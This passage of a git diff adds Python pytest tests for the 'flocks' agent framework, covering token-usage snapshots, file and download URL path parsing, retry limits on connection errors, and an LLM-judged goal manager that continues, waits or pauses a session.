+        fake_system_prompt_tokens,
+    )
+    monkeypatch.setattr(
+        context_usage,
+        "_estimate_tool_definition_tokens",
+        fake_tool_definition_tokens,
+    )
+    return state
+
+
+@pytest.mark.asyncio
+async def test_context_usage_prefers_fresh_observed_tokens(context_usage_mocks):
+    msg = _message(
+        "assistant-1",
+        tokens={
+            "input": 90,
+            "output": 20,
+            "reasoning": 5,
+            "cache": {"read": 10, "write": 0},
+        },
+    )
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 60
+    context_usage_mocks["system_prompt"] = 30
+    context_usage_mocks["tool_definitions"] = 20
+    context_usage_mocks["parts"] = {
+        "assistant-1": [
+            SimpleNamespace(type="text", text="c" * 160),
+            SimpleNamespace(type="reasoning", text="r" * 80),
+        ]
+    }
+
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+
+    assert snapshot.used_tokens == 125
+    assert snapshot.observed_tokens == 125
+    assert snapshot.estimated_tokens == 110
+    assert snapshot.source == "observed"
+    assert snapshot.percent == 63
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("systemPrompt", 30),
+        ("toolDefinitions", 20),
+        ("conversation", 55),
+        ("reasoning", 20),
+        ("agentDelegation", 0),
+    ]
+    assert sum(segment.tokens for segment in snapshot.segments) == snapshot.used_tokens
+
+
+@pytest.mark.asyncio
+async def test_context_usage_falls_back_to_estimate_without_provider_tokens(context_usage_mocks):
+    msg = _message("assistant-1", tokens=None)
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 80
+
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+
+    assert snapshot.used_tokens == 80
+    assert snapshot.observed_tokens is None
+    assert snapshot.source == "estimated"
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("conversation", 80),
+        ("agentDelegation", 0),
+    ]
+
+
+@pytest.mark.asyncio
+async def test_context_usage_ignores_observed_tokens_after_later_summary(context_usage_mocks):
+    observed = _message(
+        "assistant-1",
+        created=100,
+        tokens={"input": 190, "output": 20, "cache": {"read": 0, "write": 0}},
+    )
+    summary = _message(
+        "summary-1",
+        created=200,
+        tokens=None,
+        finish="summary",
+        summary={"tokens": 40},
+    )
+    context_usage_mocks["active"] = [observed, summary]
+    context_usage_mocks["all"] = [observed, summary]
+    context_usage_mocks["estimate"] = 40
+
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+
+    assert snapshot.used_tokens == 40
+    assert snapshot.observed_tokens is None
+    assert snapshot.source == "estimated"
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("conversation", 40),
+        ("agentDelegation", 0),
+    ]
+
+
+@pytest.mark.asyncio
+async def test_context_usage_does_not_scan_archived_history(context_usage_mocks):
+    active = _message("assistant-1", tokens=None)
+    archived = _message("archived-1", tokens=None, compacted={"summary": "old"})
+    context_usage_mocks["active"] = [active]
+    context_usage_mocks["all"] = [active, archived]
+    context_usage_mocks["estimate"] = 40
+
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+
+    assert context_usage_mocks["list_calls"] == [False]
+    assert snapshot.compacted_tokens == 0
+    assert snapshot.excluded_segments == []
+
+
+@pytest.mark.asyncio
+async def test_context_usage_splits_tool_parts_from_conversation(context_usage_mocks):
+    msg = _message("assistant-1", tokens=None)
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 30
+    context_usage_mocks["parts"] = {
+        "assistant-1": [
+            SimpleNamespace(
+                type="tool",
+                state=SimpleNamespace(
+                    input={},
+                    output="b" * 120,
+                    time={"start": 1, "end": 2},
+                ),
+            )
+        ]
+    }
+
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+
+    assert snapshot.used_tokens == 30
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("tools", 30),
+        ("agentDelegation", 0),
+    ]
+    assert sum(segment.tokens for segment in snapshot.segments) == 30
+
+
+@pytest.mark.asyncio
+async def test_context_usage_splits_skill_and_delegation_tools(context_usage_mocks):
+    msg = _message("assistant-1", tokens=None)
+    context_usage_mocks["active"] = [msg]
+    context_usage_mocks["all"] = [msg]
+    context_usage_mocks["estimate"] = 110
+    context_usage_mocks["parts"] = {
+        "assistant-1": [
+            SimpleNamespace(
+                type="tool",
+                tool="read",
+                state=SimpleNamespace(input={}, output="r" * 120, time={"start": 1}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                tool="skill_load",
+                state=SimpleNamespace(input={}, output="s" * 80, time={"start": 2}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                tool="task",
+                state=SimpleNamespace(input={}, output="t" * 80, time={"start": 3}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                tool="delegate_task",
+                state=SimpleNamespace(input={}, output="d" * 40, time={"start": 4}),
+            ),
+            SimpleNamespace(
+                type="tool",
+                metadata={"tool": "skill_load"},
+                state=SimpleNamespace(input={}, output="m" * 40, time={"start": 5}),
+            ),
+            SimpleNamespace(
+                type="subtask",
+                prompt="p" * 40,
+                description="q" * 40,
+            ),
+        ]
+    }
+
+    snapshot = await context_usage.build_context_usage_snapshot("sess-1")
+
+    assert [(segment.key, segment.tokens) for segment in snapshot.segments] == [
+        ("tools", 30),
+        ("skillLoad", 30),
+        ("agentDelegation", 50),
+    ]
+    tools_segment = next(segment for segment in snapshot.segments if segment.key == "tools")
+    assert tools_segment.tokens == 30
diff --git a/tests/session/test_file_extractor.py b/tests/session/test_file_extractor.py
index 062b6d81e..e34a21c4c 100644
--- a/tests/session/test_file_extractor.py
+++ b/tests/session/test_file_extractor.py
@@ -11,11 +11,14 @@
 import base64
 import tempfile
 from pathlib import Path
+from urllib.parse import quote
 
 import pytest
 
 from flocks.session.utils.file_extractor import (
     extract_file_text,
+    file_download_url_to_path,
+    file_url_to_path,
     is_text_extractable_mime,
     read_file_part_bytes,
     truncate_extracted_text,
@@ -26,6 +29,7 @@
 # read_file_part_bytes
 # ---------------------------------------------------------------------------
 
+
 class TestReadFilePartBytes:
     def test_empty_string_returns_none(self):
         assert read_file_part_bytes("") is None
@@ -69,46 +73,117 @@ def test_file_url_with_spaces_in_path(self, tmp_path):
         result = read_file_part_bytes(url)
         assert result == b"spaced content"
 
+    def test_windows_drive_file_url_path_does_not_keep_posix_prefix(self):
+        path = file_url_to_path("file:///C:/Users/demo/Pictures/channel%20image.png")
+        assert path == "C:/Users/demo/Pictures/channel image.png"
+
+    def test_macos_file_url_path_is_decoded(self):
+        path = file_url_to_path("file:///Users/demo/Pictures/channel%20image.png")
+        assert path == "/Users/demo/Pictures/channel image.png"
+
+    def test_linux_file_url_path_is_decoded(self):
+        path = file_url_to_path("file:///home/demo/Pictures/channel%20image.png")
+        assert path == "/home/demo/Pictures/channel image.png"
+
+    def test_unc_file_url_path_preserves_host(self):
+        path = file_url_to_path("file://server/share/channel%20image.png")
+        assert path == "//server/share/channel image.png"
+
+    def test_download_url_path_is_extracted(self):
+        path = file_download_url_to_path(
+            "/api/file/download?path=C%3A%2FUsers%2Fdemo%2FPictures%2Fchannel%20image.png"
+        )
+        assert path == "C:/Users/demo/Pictures/channel image.png"
+
+    def test_macos_download_url_path_is_extracted(self):
+        path = file_download_url_to_path(
+            "/api/file/download?path=%2FUsers%2Fdemo%2FPictures%2Fchannel%20image.png"
+        )
+        assert path == "/Users/demo/Pictures/channel image.png"
+
+    def test_linux_download_url_path_is_extracted(self):
+        path = file_download_url_to_path(
+            "/api/file/download?path=%2Fhome%2Fdemo%2FPictures%2Fchannel%20image.png"
+        )
+        assert path == "/home/demo/Pictures/channel image.png"
+
+    def test_unc_download_url_path_is_extracted(self):
+        path = file_download_url_to_path(
+            "/api/file/download?path=%2F%2Fserver%2Fshare%2Fchannel%20image.png"
+        )
+        assert path == "//server/share/channel image.png"
+
+    def test_download_url_reads_file(self, tmp_path):
+        test_file = tmp_path / "channel image.png"
+        test_file.write_bytes(b"image bytes")
+        url = f"/api/file/download?path={quote(test_file.as_posix(), safe='')}"
+        result = read_file_part_bytes(url)
+        assert result == b"image bytes"
+
+    def test_absolute_download_url_reads_file(self, tmp_path):
+        test_file = tmp_path / "channel image.png"
+        test_file.write_bytes(b"image bytes")
+        url = f"http://localhost:5173/api/file/download?path={quote(test_file.as_posix(), safe='')}"
+        result = read_file_part_bytes(url)
+        assert result == b"image bytes"
+
+    def test_external_download_url_is_not_treated_as_local_file(self, tmp_path):
+        test_file = tmp_path / "secret.txt"
+        test_file.write_bytes(b"secret")
+        url = f"https://example.com/api/file/download?path={quote(test_file.as_posix(), safe='')}"
+        assert file_download_url_to_path(url) is None
+        assert read_file_part_bytes(url) is None
+
 
 # ---------------------------------------------------------------------------
 # is_text_extractable_mime
 # ---------------------------------------------------------------------------
 
+
 class TestIsTextExtractableMime:
-    @pytest.mark.parametrize("mime", [
-        "text/plain",
-        "text/html",
-        "text/css",
-        "text/javascript",
-        "text/markdown",
-        "text/csv",
-        "text/xml",
-    ])
+    @pytest.mark.parametrize(
+        "mime",
+        [
+            "text/plain",
+            "text/html",
+            "text/css",
+            "text/javascript",
+            "text/markdown",
+            "text/csv",
+            "text/xml",
+        ],
+    )
     def test_text_prefix_is_extractable(self, mime):
         assert is_text_extractable_mime(mime) is True
 
-    @pytest.mark.parametrize("mime", [
-        "application/json",
-        "application/ld+json",
-        "application/xml",
-        "application/yaml",
-        "application/x-yaml",
-        "application/javascript",
-        "application/x-sh",
-        "application/x-shellscript",
-    ])
+    @pytest.mark.parametrize(
+        "mime",
+        [
+            "application/json",
+            "application/ld+json",
+            "application/xml",
+            "application/yaml",
+            "application/x-yaml",
+            "application/javascript",
+            "application/x-sh",
+            "application/x-shellscript",
+        ],
+    )
     def test_special_application_mimes_are_extractable(self, mime):
         assert is_text_extractable_mime(mime) is True
 
-    @pytest.mark.parametrize("mime", [
-        "image/png",
-        "image/jpeg",
-        "video/mp4",
-        "audio/mpeg",
-        "application/octet-stream",
-        "application/zip",
-        "application/pdf",  # PDF handled separately
-    ])
+    @pytest.mark.parametrize(
+        "mime",
+        [
+            "image/png",
+            "image/jpeg",
+            "video/mp4",
+            "audio/mpeg",
+            "application/octet-stream",
+            "application/zip",
+            "application/pdf",  # PDF handled separately
+        ],
+    )
     def test_binary_mimes_are_not_extractable(self, mime):
         assert is_text_extractable_mime(mime) is False
 
@@ -120,6 +195,7 @@ def test_empty_string_is_not_extractable(self):
 # truncate_extracted_text
 # ---------------------------------------------------------------------------
 
+
 class TestTruncateExtractedText:
     def test_short_text_not_truncated(self):
         text = "hello world"
@@ -167,6 +243,7 @@ def test_default_max_chars(self):
 # extract_file_text
 # ---------------------------------------------------------------------------
 
+
 class TestExtractFileText:
     def test_plain_text_file(self, tmp_path):
         f = tmp_path / "readme.txt"
diff --git a/tests/session/test_goal.py b/tests/session/test_goal.py
new file mode 100644
index 000000000..7e845d7f3
--- /dev/null
+++ b/tests/session/test_goal.py
@@ -0,0 +1,383 @@
+from __future__ import annotations
+
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.command.direct import run_direct_command
+from flocks.session.goal import JUDGE_MAX_TOKENS, GoalManager
+
+
+@pytest.mark.asyncio
+async def test_goal_command_sets_state_and_prompt():
+    result = await run_direct_command(
+        "goal",
+        args="fix failing tests",
+        session_id="goal_command_session",
+    )
+
+    assert result.handled is True
+    assert result.text is None
+    assert result.prompt is not None
+    assert "Active goal: fix failing tests" in result.prompt
+    assert "specific blocker" in result.prompt
+
+    state = await GoalManager.get("goal_command_session")
+
+    assert state is not None
+    assert state.status == "active"
+    assert state.objective == "fix failing tests"
+
+
+@pytest.mark.asyncio
+async def test_goal_command_rejects_empty_objective():
+    result = await run_direct_command(
+        "goal",
+        args="",
+        session_id="goal_empty_session",
+    )
+
+    assert result.handled is True
+    assert result.success is False
+    assert result.text == "Usage: /goal <objective>"
+    assert result.prompt is None
+
+
+@pytest.mark.asyncio
+async def test_goal_records_only_first_initial_clarification():
+    session_id = "goal_initial_clarification_session"
+    await GoalManager.set_goal(session_id, "make it work")
+
+    first_state = await GoalManager.record_initial_clarification(
+        session_id,
+        [{"question": "What should work?"}],
+        [["The MCP test connection button"]],
+        message_id="msg_question_1",
+        call_id="call_question_1",
+    )
+    second_state = await GoalManager.record_initial_clarification(
+        session_id,
+        [{"question": "Should I run tests?"}],
+        [["Yes"]],
+        message_id="msg_question_2",
+        call_id="call_question_2",
+    )
+
+    assert first_state is not None
+    assert second_state is not None
+    state = await GoalManager.get(session_id)
+    assert state is not None
+    assert state.initial_clarification is not None
+    assert state.initial_clarification.message_id == "msg_question_1"
+    assert state.initial_clarification.call_id == "call_question_1"
+    assert state.initial_clarification.answers[0].question == "What should work?"
+    assert state.initial_clarification.answers[0].answer == "The MCP test connection button"
+    assert "Should I run tests?" not in state.initial_clarification.text
+
+
+@pytest.mark.asyncio
+async def test_goal_clear_removes_persisted_state():
+    session_id = "goal_clear_session"
+    await GoalManager.set_goal(session_id, "make it work")
+
+    deleted = await GoalManager.clear(session_id)
+    state = await GoalManager.get(session_id)
+
+    assert deleted is True
+    assert state is None
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_completes_when_judge_finds_done():
+    session_id = "goal_complete_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "complete", "reason": "The final response says the implementation and tests are complete."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Implemented the feature, updated the tests, and the focused test suite passed.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+
+    assert decision.verdict == "complete"
+    assert decision.should_continue is False
+    assert state is not None
+    assert state.status == "completed"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_blocks_when_judge_finds_goal_unachievable():
+    session_id = "goal_blocked_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "blocked", "reason": "The repository is unavailable, so the goal is blocked."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I cannot proceed because the repository is unavailable.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+
+    assert decision.verdict == "blocked"
+    assert decision.should_continue is False
+    assert state is not None
+    assert state.status == "blocked"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_agent_asks_for_clarification():
+    session_id = "goal_waiting_session"
+    await GoalManager.set_goal(session_id, "write tests 10 times")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "waiting", "reason": "The assistant is asking the user for clarification."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Please clarify what tests to write and where to place them.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "The assistant is asking the user for clarification."
+    assert state is not None
+    assert state.status == "active"
+    assert state.last_verdict == "waiting"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_runtime_has_pending_user_input():
+    session_id = "goal_pending_user_input_session"
+    await GoalManager.set_goal(session_id, "triage phishing email")
+
+    decision = await GoalManager.evaluate_after_turn(
+        session_id,
+        "I made progress and can continue.",
+        pending_user_input=True,
+    )
+    state = await GoalManager.get(session_id)
+
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "session has a pending user question"
+    assert state is not None
+    assert state.status == "active"
+    assert state.last_verdict == "waiting"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_continues_until_budget_then_pauses():
+    session_id = "goal_budget_session"
+    state = await GoalManager.set_goal(session_id, "keep going", max_turns=1)
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "continue", "reason": "The work is not complete yet."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I made progress.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+    state = await GoalManager.get(session_id)
+
+    assert decision.verdict == "continue"
+    assert decision.should_continue is False
+    assert state is not None
+    assert state.status == "paused"
+    assert state.paused_reason == "turn budget exhausted (1/1)"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_uses_model_judge_when_provider_model_are_available():
+    session_id = "goal_model_judge_complete_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "complete", "reason": "The final response says the implementation and tests are complete."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Implemented the feature and tests passed.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    assert decision.verdict == "complete"
+    assert decision.reason == "The final response says the implementation and tests are complete."
+
+
+@pytest.mark.asyncio
+async def test_goal_model_judge_receives_initial_clarification():
+    session_id = "goal_model_judge_clarification_session"
+    await GoalManager.set_goal(session_id, "make it work")
+    await GoalManager.record_initial_clarification(
+        session_id,
+        [{"question": "What should work?"}],
+        [["The MCP test connection button should submit even with a blank saved name."]],
+    )
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "continue", "reason": "The response says more work remains."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I made progress.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    judge_prompt = provider.chat.await_args.kwargs["messages"][1].content
+    assert "Original goal:\nmake it work" in judge_prompt
+    assert "Initial user clarification:" in judge_prompt
+    assert "The MCP test connection button should submit" in judge_prompt
+    assert decision.verdict == "continue"
+
+
+@pytest.mark.asyncio
+async def test_goal_model_judge_uses_provider_options_without_main_token_budget():
+    session_id = "goal_model_judge_provider_options_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "complete", "reason": "The final response says the goal is complete."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider), patch(
+        "flocks.session.goal.build_provider_options",
+        return_value={"extra_body": {"reasoning_split": True}, "max_tokens": 128000},
+    ) as build_options:
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Goal is complete.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    build_options.assert_called_once_with("test-provider", "test-model")
+    provider.chat.assert_awaited_once()
+    kwargs = provider.chat.await_args.kwargs
+    assert kwargs["extra_body"] == {"reasoning_split": True}
+    assert kwargs["max_tokens"] == JUDGE_MAX_TOKENS
+    assert kwargs["temperature"] == 0
+    assert decision.verdict == "complete"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_continues_when_model_judge_says_not_done():
+    session_id = "goal_model_judge_continue_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"verdict": "continue", "reason": "The response says more work remains."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "I made progress.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    assert decision.verdict == "continue"
+    assert decision.should_continue is True
+    assert decision.reason == "The response says more work remains."
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_model_judge_returns_legacy_done_schema():
+    session_id = "goal_legacy_done_schema_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(
+        chat=AsyncMock(return_value=SimpleNamespace(
+            content='{"done": false, "reason": "The assistant is asking the user for clarification."}'
+        ))
+    )
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Please clarify which tests to run.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "goal judge failed; waiting instead of continuing autonomously"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_waits_when_model_judge_fails():
+    session_id = "goal_model_judge_failure_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(chat=AsyncMock(side_effect=RuntimeError("judge unavailable")))
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Implemented the feature and tests passed.",
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_awaited_once()
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
+    assert decision.reason == "goal judge failed; waiting instead of continuing autonomously"
+
+
+@pytest.mark.asyncio
+async def test_goal_evaluation_skips_model_judge_when_waiting_for_user_input():
+    session_id = "goal_model_judge_pending_input_session"
+    await GoalManager.set_goal(session_id, "finish implementation")
+    provider = SimpleNamespace(chat=AsyncMock())
+
+    with patch("flocks.session.goal.Provider.get", return_value=provider):
+        decision = await GoalManager.evaluate_after_turn(
+            session_id,
+            "Please provide more input.",
+            pending_user_input=True,
+            provider_id="test-provider",
+            model_id="test-model",
+        )
+
+    provider.chat.assert_not_awaited()
+    assert decision.verdict == "waiting"
+    assert decision.should_continue is False
diff --git a/tests/session/test_retry.py b/tests/session/test_retry.py
index 09bf3c61f..fcc63b7ee 100644
--- a/tests/session/test_retry.py
+++ b/tests/session/test_retry.py
@@ -94,6 +94,15 @@ def test_string_message_timeout_pattern(self):
         result = SessionRetry.retryable(error)
         assert result is not None
 
+    def test_string_message_connection_error_pattern(self):
+        error = {
+            "name": "APIConnectionError",
+            "data": {"message": "Connection error."},
+        }
+        result = SessionRetry.retryable(error)
+        assert result is not None
+        assert SessionRetry.is_connection_error(error) is True
+
     def test_empty_error_returns_none(self):
         assert SessionRetry.retryable({}) is None
 
diff --git a/tests/session/test_runner_step.py b/tests/session/test_runner_step.py
index a14d5c109..cbfb5571b 100644
--- a/tests/session/test_runner_step.py
+++ b/tests/session/test_runner_step.py
@@ -251,6 +251,14 @@ def test_timeout_exception_is_retryable(self):
         result = runner._exception_to_error_dict(exc)
         assert result["data"]["isRetryable"] is True
 
+    def test_connection_error_exception_is_retryable(self):
+        runner = _make_runner()
+        exc = Exception("Connection error.")
+        result = runner._exception_to_error_dict(exc)
+        assert result["name"] == "APIError"
+        assert result["data"]["isRetryable"] is True
+        assert result["data"]["displayMessage"] == runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE
+
     def test_exception_with_status_code_429(self):
         runner = _make_runner()
         exc = Exception("Rate limited")
@@ -2212,6 +2220,60 @@ async def fake_to_chat_messages(_messages, _system_prompts):  # noqa: ANN001
     assert result.content == "done"
 
 
+@pytest.mark.asyncio
+async def test_process_step_limits_connection_error_retries(monkeypatch):
+    runner = _make_runner("ses_runner_connection_error")
+    runner.callbacks = RunnerCallbacks(on_error=AsyncMock())
+
+    last_user = UserMessageInfo(
+        id="msg_user_connection_error",
+        sessionID=runner.session.id,
+        role="user",
+        time={"created": 1_000},
+        agent="rex",
+        model={"providerID": "bailian", "modelID": "deepseek-v4-flash"},
+    )
+    agent = SimpleNamespace(name="rex", steps=None, mode="primary", prompt="", tools=[])
+    provider = MagicMock()
+    provider.is_configured.return_value = True
+    assistant_msg = SimpleNamespace(id="msg_assistant_connection_error")
+    update_mock = AsyncMock(return_value=None)
+    call_count = 0
+
+    async def fake_call_llm(*_args, **_kwargs):
+        nonlocal call_count
+        call_count += 1
+        raise Exception("Connection error.")
+
+    monkeypatch.setattr(runner_mod.Agent, "get", AsyncMock(return_value=agent))
+    monkeypatch.setattr(runner_mod.Provider, "get", lambda provider_id: provider)
+    monkeypatch.setattr(runner_mod.Provider, "apply_config", AsyncMock(return_value=None))
+    monkeypatch.setattr(runner_mod.SessionPrompt, "build_system_prompts", AsyncMock(return_value=[]))
+    monkeypatch.setattr(runner, "_build_callable_tool_schema", AsyncMock(return_value=[]))
+    monkeypatch.setattr(
+        runner,
+        "_to_chat_messages",
+        AsyncMock(return_value=[SimpleNamespace(role="user", content="hi")]),
+    )
+    monkeypatch.setattr(runner_mod.Message, "get_text_content", AsyncMock(return_value="hi"))
+    monkeypatch.setattr(runner_mod.Message, "create", AsyncMock(return_value=assistant_msg))
+    monkeypatch.setattr(runner_mod.Message, "update", update_mock)
+    monkeypatch.setattr(runner_mod.SessionRetry, "sleep", AsyncMock(return_value=None))
+    monkeypatch.setattr(runner, "_call_llm", fake_call_llm)
+
+    result = await runner._process_step([last_user], last_user)
+
+    assert call_count == 4
+    assert result.action == "stop"
+    assert result.error == runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE
+    runner.callbacks.on_error.assert_awaited_with(runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE)
+
+    final_update = update_mock.await_args_list[-1].kwargs
+    assert final_update["finish"] == "error"
+    assert final_update["error"]["data"]["message"] == "Connection error."
+    assert final_update["error"]["data"]["displayMessage"] == runner_mod.CONNECTION_ERROR_DISPLAY_MESSAGE
+
+
 @pytest.mark.asyncio
 async def test_process_step_marks_aborted_llm_message_as_error(monkeypatch):
     runner = _make_runner("ses_runner_aborted_result")
diff --git a/tests/session/test_session_abort_inject.py b/tests/session/test_session_abort_inject.py
index ab3e06b9c..0f3138b1a 100644
--- a/tests/session/test_session_abort_inject.py
+++ b/tests/session/test_session_abort_inject.py
@@ -15,6 +15,7 @@
 import pytest
 
 from flocks.session.message import ToolPart, ToolStateCompleted
+from flocks.session.goal import GoalDecision
 from flocks.session.session_loop import SessionLoop, LoopCallbacks, LoopContext, LoopResult
 from flocks.session.runner import SessionRunner, StepResult
 from flocks.session.session import SessionInfo
@@ -356,6 +357,257 @@ def _make_msg(msg_id: str, role: str, finish: str = None, *, tokens=None, summar
         msg.summary = summary
         return msg
 
+    @pytest.mark.asyncio
+    async def test_run_loop_continues_for_active_goal_after_stop(self):
+        session = SimpleNamespace(
+            id="turn_goal_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        user = self._make_msg("msg_001", "user")
+        assistant = self._make_msg("msg_002", "assistant", finish="stop")
+        goal_user = self._make_msg("msg_003", "user")
+        assistant_after_goal = self._make_msg("msg_004", "assistant", finish="stop")
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[
+                [user],
+                [user, assistant],
+                [user, assistant, goal_user],
+                [user, assistant, goal_user, assistant_after_goal],
+            ])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+        goal_decisions = [
+            GoalDecision(
+                status="active",
+                verdict="continue",
+                should_continue=True,
+                continuation_prompt="continue toward goal",
+                reason="not done",
+            ),
+            GoalDecision(status="completed", verdict="inactive"),
+        ]
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="still working"),
+        ), patch(
+            "flocks.session.session_loop.Message.create",
+            AsyncMock(return_value=goal_user),
+        ) as create_message, patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            AsyncMock(side_effect=goal_decisions),
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(side_effect=[StepResult(action="stop"), StepResult(action="stop")]),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        create_message.assert_awaited_once()
+        assert create_message.await_args.kwargs["content"] == "continue toward goal"
+        assert create_message.await_args.kwargs["synthetic"] is True
+        assert create_message.await_args.kwargs["part_metadata"]["goalContinuation"] is True
+        event_names = [call.args[0] for call in event_callback.await_args_list]
+        assert event_names == [
+            "turn.started",
+            "turn.continued",
+            "turn.started",
+            "turn.stopped",
+        ]
+        continued_payload = event_callback.await_args_list[1].args[1]
+        assert continued_payload["continue_reason"] == "goal"
+        assert continued_payload["goalMessageID"] == goal_user.id
+
+    @pytest.mark.asyncio
+    async def test_run_loop_waits_for_user_input_after_goal_clarification(self):
+        session = SimpleNamespace(
+            id="turn_goal_waiting_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        user = self._make_msg("msg_001", "user")
+        assistant = self._make_msg("msg_002", "assistant", finish="stop")
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[
+                [user],
+                [user, assistant],
+            ])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
